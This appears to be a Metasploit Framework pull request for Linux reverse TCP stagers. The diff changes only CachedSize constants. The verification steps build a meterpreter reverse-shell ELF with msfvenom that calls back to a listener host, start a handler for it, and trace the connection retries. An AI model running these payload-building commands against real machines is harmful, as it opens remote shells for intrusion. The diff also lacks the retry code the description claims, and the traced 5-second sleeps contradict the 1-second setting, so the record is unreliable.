### PR TITLE
add retry support to linux x64 reverse tcp stager

### DIFF
--- a/modules/payloads/stagers/linux/x64/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x64/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/linux/x64/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 96
+  CachedSize = 127
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp

--- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 123
+  CachedSize = 127
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp

--- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
+++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb
@@ -8,7 +8,7 @@ require 'msf/core/payload/linux/reverse_tcp'
 
 module MetasploitModule
 
-  CachedSize = 166
+  CachedSize = 127
 
   include Msf::Payload::Stager
   include Msf::Payload::Linux::ReverseTcp


### PR DESCRIPTION
I add retry routine to reverse tcp x64 for [linux stagers need to support retries / delays like the Windows stagers do · Issue #8382 · rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework/issues/8382). I add StagerRetryWait and SleepSeconds options.

## Verification

List the steps needed to make sure this thing works

- [x]  ./msfconsole -qx "use exploit/multi/handler; set payload linux/x64/meterpreter/reverse_tcp; set lhost IP_ADDR; set lport PORT_NUMBER; set ExitOnSession false; run -j"
- [x] follow commands

```
$ ./msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.132.1 LPORT=4444 ReverseConnectRetries=3 SleepSeconds=1 -f elf -o "./reverse_tcp_test"
$ sudo chmod +x ./reverse_tcp_test
$ strace ./reverse_tcp_test 
execve("./reverse_tcp_test", ["./reverse_tcp_test"], [/* 74 vars */]) = 0
mmap(NULL, 4096, PROT_READ|PROT_WRITE|PROT_EXEC|0x1000, MAP_PRIVATE|MAP_ANONYMOUS, 0, 0) = 0x7f47916b5000
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 16) = -1 ECONNREFUSED (Connection refused)
nanosleep({5, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 4
connect(4, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 16) = -1 ECONNREFUSED (Connection refused)
nanosleep({5, 0}, NULL)                 = 0
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 5
connect(5, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.132.1")}, 16) = -1 ECONNREFUSED (Connection refused)
_exit(1)                                = ?
+++ exited with 1 +++

```
